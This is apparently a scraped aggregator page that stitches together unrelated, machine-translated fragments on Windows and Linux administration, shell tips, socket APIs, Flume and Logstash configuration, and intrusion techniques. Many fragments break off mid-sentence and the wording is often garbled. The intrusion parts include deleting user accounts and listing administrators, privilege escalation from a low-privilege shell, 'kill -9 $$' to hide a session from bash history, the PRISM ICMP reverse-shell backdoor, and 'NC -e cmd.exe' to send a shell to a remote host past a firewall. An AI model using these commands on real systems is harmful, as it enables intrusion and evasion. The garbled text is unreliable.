you, and delete the user name to make him beautiful,Net user username/delete Haha, he is no longer. Check whether he is an administrator. But let's check which users are in the Administrator group, so that users can be useful to us. Net localgroup administrators lists the members of the Administrator group. Then, let's look at the administrator user, because it was created when the system was created, so let's see when the system was created.Net user administrator, and then check the time when
the/var/account/pacct file. You can use the options to specify both the command name and user name. This is a GNU statistical tool.
LastlogImportance: MediumLists the last logon times of all users on the system. It exists in the/var/log/lastlog file.
LsofImportance: highList open files. This command will list all open files in a detailed table, including the file owner information, size, and information related to them.
StraceImportance: MediumDiagnostic and debugging tools for tracking systems
: Find words that begin with a specific string
cut, paste and join : Data modification
fmt: Formatting text paragraphs
pr: Formatting text into a page/column form
fold: Several lines in the wrapped text
column: Formatting text into multiple columns or tables
expandand unexpand : Converting between tabs and spaces
nl: Add line number
seq: Printing numbers
bc: Calculator
factor: Decomposition factor
gpg: Encrypt and sign files
toe: Terminfo Entries List
several times to copy the data in the s receiving buffer. The recv function only copies the data, and the protocol is used to actually receive the data.) The recv function returns the actual number of bytes of the copy.
If a recv error occurs during copy, SOCKET_ERROR is returned. If the recv function is interrupted while waiting for the Protocol to receive data, 0 is returned.
5. close Function
Function prototype: int close (SOCKET s)
Parameter description
SOCKET s:
Check if the remote port is open for bash:
NC-nvv $IP $PORTtelnet $IP $PORT
Front and back switch for current task:
Ctrl + ZFG
The first 5 characters of the Intercept variable:
${variable:0:5}
SSH Debug Mode:
ssh -vvv [email protected]_addressssh with PEM key:ssh [email protected]_address-i KEY.PEM
Monitoring log files
tail -F $FILE _nameMultiple Monitored scriptsMulti_tail:#!/bin/SHfunctio
The day station is going to be a complete day. Often we can take the server Web services, but is updated than the Western reporters also faster than the administrator of the intranet infiltration of the seeds in the bud of the right to kill. The process of extracting power from Linux system involves not only the loopholes but also many system configurations. Here are some of the ways I have summed up the right.A few prerequisitesAlready got the low-power shell.The hacked machine has a very commo
prevent the last session from being logged in bash history:
Kill-9 $$
Scan the network for open ports:
Nmap-p 8081 172.20.0.0/16
Set up git email:
git config--global user.email "me@111cn.net"
To-sync with master If you have unpublished commits:
Git pull--rebase Origin master
Move files containing "TXT" in all file names into the/home/user directory:
Find-iname "*txt*"-exec mv-v {}/home/user;
To display files in line by row:
Paste Test.txt Test1.txt
The progress bar in the shell:
PV
{
hosts =>" elasticsearch:9200 "#将logstash的输出到 Elasticsearch here to your own host
}
}
And then we need to start the Kibana.
Write a startup script to wait for Elasticserach to run successfully and start
#!/usr/bin/env Bash
# The Elasticsearch container to be ready before starting.
echo "Stalling for Elasticsearch" while
true; does
nc-q 1 elasticsearch 9200 2>/dev/null break
do Ne
echo "starting Kibana"
exec Kibana
can be separated by an intermediate gateway-
K: Route packets with the list of computers specified by Computer-list. Consecutive computers cannot be separated by an intermediary gateway
-w:timeout Specifies the time-out interval in milliseconds
desination-list: Specifies that the remote computer to ping
can roughly determine the target host operating system type by TTL value:
Windows General TTL is between 100~130;
Unix/linux between General 240~255 or 50~60.
Collect from different sources, aggregate logs, and transfer them to the storage system.
Source is used to read data, can be a variety of clients, or from another agent, deposited into the channel,sink to consume, the entire process is asynchronous.
The event is only deleted when it is successfully deposited into the channel of the next agent (multiple agents) or the final destination (a single agent), ensuring reliability.
Channel has two kinds of files and memory.
Multiple instances to
factor, while operating systems and networks are also the cause of outages, sans and RAID storage systems are not backup solutions.* When using the pipe command, the first advantage is that the output file is automatically compressed during execution and does not require any additional temporary disk space, which is helpful when disk space is limited, and the performer barThe command takes extra time to be its disadvantage, used in combination with mysqldump, locks all tables, affects applicati
command will scan a server to locate the open ports and locate the services associated with those ports. This is an important security tool to prevent the network from being hacked.ncDegree of importance: MediumThe NC (NETCAT) tool is a complete toolkit that you can use to connect and listen to TCP and UDP ports. It can be used as a diagnostic and test tool, or as a component of a script-based HTTP client
determine the type of firewall.
• Interception of advertisements on fire walls. Although this method is not necessarily effective, some older firewalls may actually add some version information to the AD.
Finally, there is a honeypot. These devices can be used to trap or "imprison" attackers, or perhaps to learn more about their activities. The honeypot is divided into two types: low interaction and high interaction. The honeypot can be detected by observing their function. A good low interac
The ping-based ICMP backdoor that was inadvertently seen while searching. So to the author's GitHub to see, incredibly is engraved, in order to level, can only endure to see, the student dog hurt. Fortunately it's easier to understand, as the introduction says: "PRISM is a user space stealth reverse shell backdoor, written in pure C."Project address:https://github.com/andreafabrizi/prismPrism has only two main files, simple configuration, can be run on Linux,Solaris,AIX,bsd/mac,Android and man
:
Kill-9 $$
Scan the network for open ports:
Copy Code code as follows:
Nmap-p 8081 172.20.0.0/16
Set up git email:
Copy Code code as follows:
git config--global user.email "me@example.com"
To-sync with master If you have unpublished commits:
Copy Code code as follows:
Git pull--rebase Origin master
Move files containing "TXT" in all file names into the/home/user directory:
Copy Code code as follows:
HTTP ProxyConfigure HTTP_PROXY Environment variables directly
git config http.proxy
Http.proxy
Override the HTTP proxy, normally configured using the Http_proxy, Https_proxy, and
All_proxy Environment Variables (Curl (1)). This can is overridden on a per-remote
Basis Remote.
To configure a separate HTTPS proxy for a fixed remote
Remote.For remotes so require curl (HTTP, HTTPS and FTP), the URL to the proxy to
Remote. Set to the empty string to disable proxying for this remote.
How to use:
gi
(the general firewall on the local SYN connection request does not intercept)
Use tool Netcat to puncture this firewall:
NC-E cmd.exe remote IP remote monitor port
Subsequently, Port Multiplexing technology also appeared, the reuse of firewall open ports: such as 80,21,445
Typical backdoor like Hkdoor,ntrookit (the author is Chinese Yyt_hac)
There is also the use of unwarranted port protocols for communica
output, if you want to use the tail command, the required file is large enough to see the outputExec.conf
a1.sources = R1
a1.sinks = K1
a1.channels = C1
# describe/configure the source
#a1. Sources.r1.type = Exec
#a1. sources.r1.channels = C1
#a1. Sources.r1.command = tail-f/var/log/flume.log
a1.sources.r1.type = Netcat
a1.sources.r1.bind = localhost
a1.sources.r1.port = 44444
# Describe the sink
A1.sinks.k1.type = Logger
# Use a channel which buf
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.